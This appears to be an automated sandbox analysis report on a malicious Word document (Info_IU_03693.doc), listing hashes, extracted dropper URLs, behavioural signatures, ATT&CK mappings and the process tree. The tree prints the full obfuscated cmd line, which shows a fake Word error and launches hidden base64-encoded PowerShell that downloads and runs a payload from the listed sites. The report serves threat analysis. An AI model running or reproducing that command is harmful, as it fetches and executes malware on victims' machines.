Analysis

  • max time kernel
    72s
  • max time network
    114s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    20-01-2021 19:33

General

  • Target

    Info_IU_03693.doc

  • Size

    160KB

  • MD5

    11b2f224825ee841b6df0e52298bee2c

  • SHA1

    9e139896444a4c946221570a019b3fec05f0a419

  • SHA256

    b9f57f97d4ea9c107ca90927fdd5e4f7b5e3eb315ff4fa568f600f1700dc3f8f

  • SHA512

    1a6e4b11ba9988c98ba663b6bfd38022aae0183fde5808e036de2c6b831c54a0d5516031dc6bb0de53105cd2a3b86903bc0b14b991d38ad1f2c5335df32c383a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Info_IU_03693.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:548
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:936

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/268-5-0x0000000000000000-mapping.dmp
    • memory/548-2-0x0000000072DA1000-0x0000000072DA4000-memory.dmp
      Filesize

      12KB

    • memory/548-3-0x0000000070821000-0x0000000070823000-memory.dmp
      Filesize

      8KB

    • memory/548-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/936-8-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp
      Filesize

      9.9MB

    • memory/936-7-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp
      Filesize

      8KB

    • memory/936-6-0x0000000000000000-mapping.dmp
    • memory/936-9-0x00000000023F0000-0x00000000023F1000-memory.dmp
      Filesize

      4KB

    • memory/936-10-0x000000001ABD0000-0x000000001ABD1000-memory.dmp
      Filesize

      4KB

    • memory/936-11-0x000000001AB50000-0x000000001AB52000-memory.dmp
      Filesize

      8KB

    • memory/936-12-0x000000001AB54000-0x000000001AB56000-memory.dmp
      Filesize

      8KB

    • memory/936-13-0x0000000002540000-0x0000000002541000-memory.dmp
      Filesize

      4KB

    • memory/936-14-0x0000000002430000-0x0000000002431000-memory.dmp
      Filesize

      4KB

    • memory/936-15-0x000000001B620000-0x000000001B621000-memory.dmp
      Filesize

      4KB

    • memory/936-16-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
      Filesize

      4KB